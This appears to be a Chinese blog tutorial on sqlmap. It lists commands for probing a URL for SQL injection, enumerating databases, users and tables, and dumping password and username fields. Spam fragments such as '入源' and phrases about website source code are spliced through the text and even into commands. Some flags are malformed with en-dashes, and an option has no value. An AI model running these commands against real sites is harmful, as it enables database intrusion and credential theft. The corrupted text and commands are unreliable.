1.salmap简单的入源使用步骤

salmap简单的使用步骤

       大家或许和我有同样的感受，不想花费大量时间观看视频来学习这个工具。入源因此，入源益盟qsdd指标源码我整理了以下sqlmap的入源基本使用步骤，供大家参考。入源怎么下载网站的源码下载（如有不对之处，入源分类信息网站的源码欢迎在评论区指出）

       sqlmap的入源简单使用步骤：

       1. 清除sqlmap缓存：

       python sqlmap.py --purge

       2. 检测注入点是否可用：

       python sqlmap.py -u "URL"

       3. 暴库：

       python sqlmap.py -u "URL" -dbs

       4. 暴当前使用的数据库：

       python sqlmap.py -u "URL" –current-db

       5. 暴当前使用的账户：

       python sqlmap.py -u "URL" –current-user

       6. 列出所有使用过的账户：

       python sqlmap.py -u "URL" –users

       7. 查询mysql的登录账户和密码：

       python sqlmap.py -u "URL" –passwords

       8. 列出数据库中的表：

       python sqlmap.py -u "URL" -D "指定的数据库名" –tables

       9. 列出表中字段：

       python sqlmap.py -u "URL" -D "指定数据库名" -T "指定的表名" –columns

       . 爆字段内容：

       python sqlmap.py -u "URL" -D "指定数据库名" -T "指定的表名" -C "字段名" -dump

       此外，还有一些参数可供使用：

       1. 列数据库信息：--dbs

       2. web当前使用的入源数据库：--current-db

       3. web数据库使用账户：--current-user

       4. 列出sqlserver所有用户：--users

       5. 数据库账户与密码：--passwords

       6. 指定库名列出所有表：-D database --tables

       -D：指定数据库名称

       7. 指定库名表名列出所有字段：-D antian-T admin --columns

       -T：指定要列出字段的表

       8. 指定库名表名字段dump出指定字段：

       -D secbang_com -T admin -C id,password,username --dump

       -D antian -T userb -C"email,Username,userpassword" --dump

       可加双引号，也可不加双引号。入源

       9. 导出多少条数据：

       -D tourdata -T userb -C"email,入源Username,userpassword" --start 1 --stop --dump

       希望这些信息能对大家有所帮助！